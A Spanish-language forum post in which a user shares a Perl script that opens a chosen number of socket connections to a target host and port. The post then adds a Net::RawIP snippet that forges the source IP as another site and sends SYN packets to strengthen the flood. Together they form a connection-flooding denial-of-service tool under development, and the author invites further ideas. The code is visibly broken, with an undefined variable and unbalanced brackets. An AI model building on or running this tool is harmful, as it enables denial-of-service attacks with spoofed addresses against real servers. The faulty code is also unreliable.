Gracias de todas formas pero al hacerlo te creaba una sola conexión y esperaba a que terminara y comenzaba la otra y no era esa la idea.
Pedí ayuda en un foro esclusivo de perl y me han ayudado muchisimo y he aprendido bastante también. El código quedó así:
#!/usr/bin/perl
use IO::Socket;
use strict;
use warnings;
$|=1;
my ($sitio, $port, $protocolo, $n);
unless (@ARGV == 4) { die "uso: $0 [Host] [Puerto] [Protocolo] [Nº Sockets]\nEjemplo : $0 127.0.0.1 22 tcp 1000" } ($sitio, $port, $protocolo, $n) = @ARGV;
my @hosts = map { $sitio } 1 .. $n; sub doit {
my $sock
= new IO::Socket::INET(
PeerAddr => $server,
PeerPort => $port,
Proto => $protocolo,
}
for ( @hosts ) {
doit $_;
}
Ahora estoy intentando darle opciones de spoofing ip para aumentar su capacidad:
use Net::RawIP;
$n = Net::RawIP->new;
$n->set({
ip => {
saddr => 'google.cl',
daddr => '127.0.0.1',
},
tcp => {
source => 3254,
dest => 22,
psh => 1,
syn => 1,
},
});
$n->send;
$n->ethnew("eth0");
$n->ethset(source => 'google.cl', dest =>'127.0.0.1');
$n->ethsend;
$p = $n->pcapinit("eth0", "dst port 21", 1500, 30);
$f = dump_open($p, "/home/yan/log");
loop($p, 10, \&dump, $f);
Cuando termine el programa lo postearé. Si tienen ideas... bienvenidos sean.
Si no se porque casi nadie se dedica a Perl
Incluso la gran mayoría de los exploits que puedes encontrar en milw0rm están hechos en perl y para mi es un muy buén lenguaje como para continuar mas adelante con C y ensamblador.